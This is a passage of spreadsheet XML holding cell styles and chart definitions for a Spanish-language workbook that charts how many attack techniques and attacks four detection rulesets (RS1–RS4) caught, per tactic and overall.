    <xf borderId="6" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="27" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="27" numFmtId="1" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="28" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="right" readingOrder="0" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="0" xfId="0" applyAlignment="1" applyFont="1">
      <alignment horizontal="center" shrinkToFit="0" vertical="bottom" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="10" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="2" numFmtId="10" xfId="0" applyFont="1" applyNumberFormat="1"/>
    <xf borderId="16" fillId="0" fontId="26" numFmtId="0" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="center" wrapText="0"/>
    </xf>
    <xf borderId="0" fillId="0" fontId="27" numFmtId="2" xfId="0" applyAlignment="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="5" fillId="0" fontId="27" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="7" fillId="0" fontId="27" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center" readingOrder="0" shrinkToFit="0" vertical="top" wrapText="0"/>
    </xf>
    <xf borderId="8" fillId="0" fontId="27" numFmtId="2" xfId="0" applyAlignment="1" applyBorder="1" applyFont="1" applyNumberFormat="1">
      <alignment horizontal="center"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charts/_rels/chartEx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PORCENTAJE DE TÉCNICAS DETECTADAS POR RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$K$27:$K$28</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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PORCENTAJE DE TÉCNICAS DETECTADAS POR RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$L$27:$L$28</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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PORCENTAJE DE TÉCNICAS DETECTADAS POR RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$M$27:$M$28</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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PORCENTAJE DE TÉCNICAS DETECTADAS POR RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$N$27:$N$28</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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TÉCNICAS DETECTADAS POR TÁCTICA - RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Técnicas Detectadas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$K$10:$K$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$O$10:$O$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1633311596"/>
        <c:axId val="1743775612"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="163331159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1800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1743775612"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1743775612"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="16.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33311596"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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TÉCNICAS DETECTADAS POR TÁCTICA - RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Técnicas Detectadas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$L$10:$L$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$O$10:$O$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="421789007"/>
        <c:axId val="1216125777"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="42178900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1800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1216125777"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1216125777"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="16.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21789007"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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TÉCNICAS DETECTADAS POR TÁCTICA - RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Técnicas Detectadas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$L$10:$L$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$O$10:$O$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="1692919004"/>
        <c:axId val="2053352510"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="169291900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1800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="2053352510"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="2053352510"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="16.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92919004"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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TÉCNICAS DETECTADAS POR TÁCTICA - RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:barChart>
        <c:barDir val="col"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:tx>
            <c:v>Técnicas Detectadas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="FF9900"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$N$10:$N$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:ser>
          <c:idx val="1"/>
          <c:order val="1"/>
          <c:tx>
            <c:v>Total Técnicas</c:v>
          </c:tx>
          <c:spPr>
            <a:solidFill>
              <a:srgbClr val="4A86E8"/>
            </a:solidFill>
            <a:ln cmpd="sng">
              <a:solidFill>
                <a:srgbClr val="000000">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
            </a:ln>
          </c:spPr>
          <c:dPt>
            <c:idx val="7"/>
          </c:dPt>
          <c:cat>
            <c:strRef>
              <c:f>'(D) - Resultados'!$J$10:$J$22</c:f>
            </c:strRef>
          </c:cat>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$O$10:$O$22</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:axId val="738276681"/>
        <c:axId val="1131026019"/>
      </c:barChart>
      <c:catAx>
        <c:axId val="73827668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1800000"/>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0">
              <a:defRPr b="1" sz="1000">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
              </a:defRPr>
            </a:pPr>
          </a:p>
        </c:txPr>
        <c:crossAx val="1131026019"/>
      </c:catAx>
      <c:valAx>
        <c:axId val="1131026019"/>
        <c:scaling>
          <c:orientation val="minMax"/>
          <c:max val="16.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38276681"/>
      </c:valAx>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="1A1A1A"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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PORCENTAJE DE ATAQUES DETECTADOS POR RS1</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$R$27:$R$28</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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PORCENTAJE DE ATAQUES DETECTADOS POR RS2</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$S$27:$S$28</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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PORCENTAJE DE ATAQUES DETECTADOS POR RS3</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$T$27:$T$28</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>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PORCENTAJE DE ATAQUES DETECTADOS POR RS4</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:view3D>
      <c:rotX val="50"/>
      <c:perspective val="0"/>
    </c:view3D>
    <c:plotArea>
      <c:layout/>
      <c:pie3DChart>
        <c:varyColors val="1"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:dPt>
            <c:idx val="0"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6FA8DC"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dPt>
            <c:idx val="1"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="0B5394"/>
              </a:solidFill>
            </c:spPr>
          </c:dPt>
          <c:dLbls>
            <c:showLegendKey val="0"/>
            <c:showVal val="0"/>
            <c:showCatName val="0"/>
            <c:showSerName val="0"/>
            <c:showPercent val="1"/>
            <c:showBubbleSize val="0"/>
            <c:showLeaderLines val="1"/>
          </c:dLbls>
          <c:val>
            <c:numRef>
              <c:f>'(D) - Resultados'!$U$27:$U$28</c:f>
              <c:numCache/>
            </c:numRef>
          </c:val>
        </c:ser>
        <c:dLbls>
          <c:showLegendKey val="0"/>
          <c:showVal val="0"/>
          <c:showCatName val="0"/>
          <c:showSerName val="0"/>
          <c:showPercent val="0"/>
          <c:showBubbleSize val="0"/>
        </c:dLbls>
      </c:pie3DChart>
    </c:plotArea>
    <c:legend>
      <c:legendPos val="b"/>
      <c:overlay val="0"/>
      <c:txPr>
        <a:bodyPr/>
        <a:lstStyle/>
        <a:p>
          <a:pPr lvl="0">
            <a:defRPr b="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Arial black"/>
            </a:defRPr>
          </a:pPr>
        </a:p>
      </c:txPr>
    </c:legend>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EFECTIVIDAD ALERTAS POR RULESET</a:t>
            </a:r>
          </a:p>
        </c:rich>
      </c:tx>
      <c:overlay val="0"/>
    </c:title>
    <c:plotArea>
      <c:layout/>
      <c:lineChart>
        <c:varyColors val="0"/>
        <c:ser>
          <c:idx val="0"/>
          <c:order val="0"/>
          <c:spPr>
            <a:ln cmpd="sng" w="19050">
              <a:solidFill>
                <a:srgbClr val="6AA84F">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:prstDash val="solid"/>
            </a:ln>
          </c:spPr>
          <c:marker>
            <c:symbol val="circle"/>
            <c:size val="14"/>
            <c:spPr>
              <a:solidFill>
                <a:srgbClr val="6AA84F">
                  <a:alpha val="100000"/>
                </a:srgbClr>
              </a:solidFill>
              <a:ln cmpd="sng">
                <a:solidFill>
                  <a:srgbClr val="6AA84F">
                    <a:alpha val="100000"/>
